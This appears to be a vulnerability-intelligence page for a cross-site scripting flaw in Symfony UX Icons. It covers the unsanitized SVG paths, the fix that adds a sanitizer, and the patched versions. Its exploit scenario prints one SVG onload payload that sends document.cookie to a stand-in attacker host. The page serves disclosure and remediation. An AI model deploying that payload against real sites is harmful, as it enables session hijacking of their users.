Symfony UX Icons CVE-2026-55877
MEDIUMSeverity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Iconify path is network-reachable with no auth required; victim must load the page (UI:R); SVG inline execution crosses to browser origin (S:C); no availability impact.
Primary rating from Vendor (https://github.com/symfony/ux).
CVSS VectorVendor: https://github.com/symfony/ux
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Description
The ux_icon() Twig function is marked is_safe=['html'], so Twig never escapes its output. Icon::toHtml() inlines the SVG source verbatim into the page. Browsers execute <script> elements and on* event-handler attributes found inside inline SVG, making any unsanitized icon a vector for cross-site scripting.
Two code paths were affected. In the local file path, Icon::fromFile() only stripped <script> elements that were direct children of <svg>, leaving nested scripts and all on* attributes untouched despite a code comment claiming broader protection. In the Iconify on-demand path (enabled by default), the remote JSON body field was wrapped into an Icon object with no sanitization at all. Concrete attack vectors include a malicious SVG icon pack from a third-party theme or downloaded icon set, or a controlled Iconify endpoint configured via iconify.endpoint (including a poisoned cache).
Resolution
Introducing an IconFactory that centralizes sanitization across every icon source before an Icon object is created. The sanitizer removes script-capable elements (script, foreignObject, iframe, object, embed), SMIL animations targeting on*, href, or xlink:href attributes, CDATA sections, processing instructions, all on* attributes, and javascript:, vbscript:, and data:text/html URL schemes. <style> elements are kept for theming but have any handlers stripped. Icons that contain none of these constructs are byte-for-byte identical after sanitization.
Credits
Symfony would like to thank Pascal Cescon for reporting the issue and Hugo Alliaume for providing the fix.
AnalysisAI
Cross-site scripting in Symfony UX Icons (symfony/ux-icons) allows an attacker who controls SVG icon content - via a malicious third-party icon pack, a downloaded icon set, or a tampered Iconify on-demand endpoint - to inject and execute arbitrary JavaScript in the browsers of users who load any page rendering those icons. Two distinct sanitization failures existed: the local-file path in Icon::fromFile() only stripped top-level <script> children of <svg>, ignoring nested scripts and all on* event-handler attributes, while the Iconify on-demand path (enabled by default) applied zero sanitization to the remote JSON body field before inlining it as HTML. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Two distinct attack paths exist with different preconditions. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The NVD-assigned CVSS 3.1 score of 6.1 with vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N is well-calibrated for the Iconify on-demand path: the attack reaches the vulnerable application over the network, requires no authentication to the application itself, is low-complexity, and achieves a scope change into the victim's browser context. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker compromises or spoofs the configured Iconify endpoint (or poisons a CDN cache serving icon JSON), injecting an SVG body containing an `<svg onload="document.location='https://attacker.example/steal?c='+document.cookie">` payload. When any authenticated user navigates to a page that calls `ux_icon()` with that icon name, the browser inlines the SVG verbatim and fires the `onload` handler, exfiltrating the user's session cookie to the attacker's server. … |
| Remediation | Upgrade symfony/ux-icons to version 2.36.1 (for the 2.x branch) or 3.2.0 (for the 3.x branch); both versions introduce the new `IconFactory` class that centralizes sanitization for every icon source before an `Icon` object is constructed. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-6v8j-33hc-mv84